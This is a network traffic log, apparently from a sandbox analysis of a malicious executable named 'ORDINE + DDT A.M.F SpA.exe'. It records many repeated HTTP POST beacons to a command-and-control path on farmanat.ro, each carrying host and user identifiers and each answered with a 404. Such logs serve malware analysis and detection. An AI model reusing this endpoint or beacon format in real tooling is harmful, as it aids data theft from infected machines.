Nov 25, 2021 10:52:53.467348099 CET	7090	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:53.501653910 CET	7090	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:53.551305056 CET	7090	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.11.20	49892	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:37.469780922 CET	6387	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:37.503727913 CET	6387	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:37.553401947 CET	6388	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
560	192.168.11.20	50404	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:53.974143028 CET	7091	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:54.007693052 CET	7091	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:54.057122946 CET	7092	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
561	192.168.11.20	50405	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:54.487405062 CET	7093	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:54.521599054 CET	7093	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:54.571399927 CET	7093	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
562	192.168.11.20	50406	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:54.982707977 CET	7094	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:55.016263962 CET	7094	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:55.065568924 CET	7094	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
563	192.168.11.20	50407	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:55.566183090 CET	7096	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:55.599354029 CET	7096	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:55.648091078 CET	7096	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
564	192.168.11.20	50408	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:56.047377110 CET	7097	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:56.080729008 CET	7097	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:56.129972935 CET	7098	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
565	192.168.11.20	50409	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:56.526257038 CET	7098	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:56.560775042 CET	7099	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:56.611107111 CET	7099	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
566	192.168.11.20	50410	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:57.024559021 CET	7100	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:57.058769941 CET	7100	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:57.109306097 CET	7100	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
567	192.168.11.20	50411	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:57.529844999 CET	7101	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:57.563415051 CET	7101	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:57.614809036 CET	7102	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
568	192.168.11.20	50412	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:58.031682968 CET	7102	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:58.065882921 CET	7103	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:58.180129051 CET	7103	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
569	192.168.11.20	50413	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:58.610007048 CET	7104	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:58.644468069 CET	7104	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:58.700189114 CET	7104	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.11.20	49893	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:38.005112886 CET	6388	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:38.038376093 CET	6388	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:38.094413042 CET	6389	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
570	192.168.11.20	50414	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:59.074620962 CET	7105	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:59.108258009 CET	7105	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:59.157382965 CET	7106	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
571	192.168.11.20	50415	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:59.567878962 CET	7106	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:59.602237940 CET	7106	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:59.651905060 CET	7107	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
572	192.168.11.20	50416	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:00.086672068 CET	7108	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:00.120341063 CET	7108	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:00.169751883 CET	7108	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
573	192.168.11.20	50417	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:00.611074924 CET	7109	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:00.645057917 CET	7109	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:00.696907043 CET	7110	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
574	192.168.11.20	50418	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:01.130911112 CET	7110	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:01.164452076 CET	7110	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:01.218281984 CET	7111	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
575	192.168.11.20	50419	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:01.578295946 CET	7112	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:01.612272978 CET	7112	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:01.661658049 CET	7112	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
576	192.168.11.20	50420	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:02.060782909 CET	7113	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:02.095108986 CET	7113	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:02.145915031 CET	7114	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
577	192.168.11.20	50421	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:02.537939072 CET	7114	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:02.571285963 CET	7114	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
